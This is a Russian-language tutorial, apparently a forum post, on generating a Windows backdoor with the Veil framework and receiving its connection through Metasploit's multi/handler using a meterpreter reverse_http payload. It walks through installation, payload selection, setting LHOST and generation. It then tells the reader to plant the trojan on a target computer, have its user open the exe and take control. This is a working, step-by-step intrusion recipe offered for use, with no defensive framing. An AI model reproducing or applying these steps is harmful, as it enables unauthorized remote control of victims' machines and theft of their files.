Использования Veil + msf
Привет, ребята, в этот день я хочу рассказать вам, как создать бэкдор с Veil и как использовать его через Metasploit.
Veil-это инструмент, который содержит базу уязвимостей, которые используются для бэкдора, в готовом виде.
1-Установка
git clone https://github.com/Veil-Framework/Veil.git
давайте теперь наберем и войдем в папку конфигурации в папке Veil и запустим setup.sh
cd Veil/config
- bash setup.sh
Continue with installation?отвечаем на вопрос "да".
Если установка завершилась успешно то мы увидим это
Теперь он будет выполнять установку Python через Wine.
Потому что Wine поможет нам запустить приложения для Windows на Linux, поэтому он установит версию Windows Python на наш Kali.
Сразу после этого придет установка версии Windows Ruby.
Теперь нам выскочит предупреждения
Здесь он спросит вас, существует одна и таже папка хотим ли мы продолжить установку?
Отвечаем " да " и выполняем установку Ruby.
На этот раз он попросит нас выполнить установку AutoIt.
Это язык программирования в AutoIt, и для этого нам нужно настроить его.
Потом выберите x86, если ваша система 32-битная, а 64-битная то используем нативную для х64
Дальше
apt -y install veil
после того, как это будет сделано, давайте запустим команду ниже:
/usr/share/veil/config/setup.sh --force --silent
после того, как вы это сделаете, мы увидим этот экран
cd Veil ./Veil.py
После чего пишем use 1
Тепер мы увидим, что есть 41 пейлоад.
Чтобы увидеть : list
И увидим такой список
Отсюда мы выбираем пейлоад, который мы хотим использовать, в качестве примера я выберу пейлоад 9.
После того, как вы выберете пейлоад, который мы будем использовать, появится экран для внесения необходимых настроек
Вот части, которые мы должны отредактировать:
LHOST
PROCESSORS
SLEEP
LHOST= если мы собираемся атаковать удаленный компьютер,в нашей сети,то пишем ifconfig, и получаем локальный айпи в этой сети set LHOST ip
Дальше настраиваем эти параметры
set SLEEP set PROCESSORS
После этих манипуляций прописываем generate
Далее запускаем msf и прописываем
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
Show options
давайте напишем и перейдем к экрану настроек.
Здесь мы должны написать Lhost наш ip-адрес нашего Кали.
После того, как мы сделаем наши настройки, мы должны ввести exploit и бросить троянец, который мы создали, на целевой компьютер.
Затем мы откроем созданный exe-файл пользователю целевого компьютера и подождем входа в систему из Metasploit.
Затем мы можем переключаться между файлами с помощью команд Linux.